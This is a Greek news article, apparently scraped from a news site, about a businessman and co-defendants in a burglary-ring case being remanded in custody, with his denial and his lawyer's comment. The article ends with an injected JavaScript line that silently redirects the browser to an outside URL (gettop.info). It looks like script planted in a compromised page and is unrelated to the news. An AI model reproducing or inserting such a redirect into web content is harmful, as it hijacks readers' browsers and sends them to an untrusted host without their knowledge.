Στη φυλακή ο επιχειρηματίας Αλέξανδρος Αγγλούπας για τη σπείρα των Ρομά

0
22

 

Προφυλακιστέοι κρίθηκαν άλλοι οκτώ από τους κατηγορούμενους στην υπόθεση της σπείρας διαρρηκτών πολυτελών κατοικιών που απολογήθηκαν σήμερα ενώπιον των ανακριτών Διαφθοράς.

Η δεύτερη ομάδα κατηγορουμένων που οδηγήθηκε χθες το πρωί σε απολογία ήταν 20 θεωρούμενα μέλη του κυκλώματος μεταξύ των οποίων και ο επιχειρηματίας που εμπλέκεται ως κλεπταποδόχος στην μεγάλη υπόθεση, ο οποίος με απόφαση ανακριτή και Εισαγγελέα οδηγείται στην φυλακή.

Στις φυλακές θα οδηγηθεί μετά την απολογία του και ο επιχειρηματίας Αλέξανδρος Αγγλούπας ο οποίος φέρεται να συμμετείχε στη σπείρα που άνοιγε σπίτια και βίλες επωνύμων.

Ο κατηγορούμενος αρνήθηκε πως δρούσε ως κλεπταποδόχος του κυκλώματος και φέρεται να υποστήριξε πως είναι συλλέκτης και πως από τα τρία ρολόγια μεγάλης αξίας που βρέθηκαν στη κατοχή του, τα δυο ήταν με πιστοποιητικά και το τρίτο ήταν απομίμηση. Φέρεται να είπε ακόμα πως σε τρεις από τις συναλλαγές που κατέγραψε ο κοριός της αστυνομίας δεν γνώριζε πως πρόκειται για κλοπιμαία.

Ο συνήγορος υπεράσπισης του κ. Αγγλούπα, Χρήστος Στάθης δήλωσε: «Θεωρώ ότι με τη γνωμοδότηση για την προσωρινή κράτηση του εντολέα μου κέρδισε ο κίτρινος τύπος και έχασε η δικαιοσύνη».

Πάντως από τους συνολικά 40 κατηγορούμενους που απολογήθηκαν αυτές τις δύο ημέρες οι 18 κρίθηκαν προφυλακιστέοι και οι υπόλοιποι αφέθηκαν ελεύθεροι με περιοριστικούς όρους ή χωρίς.

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here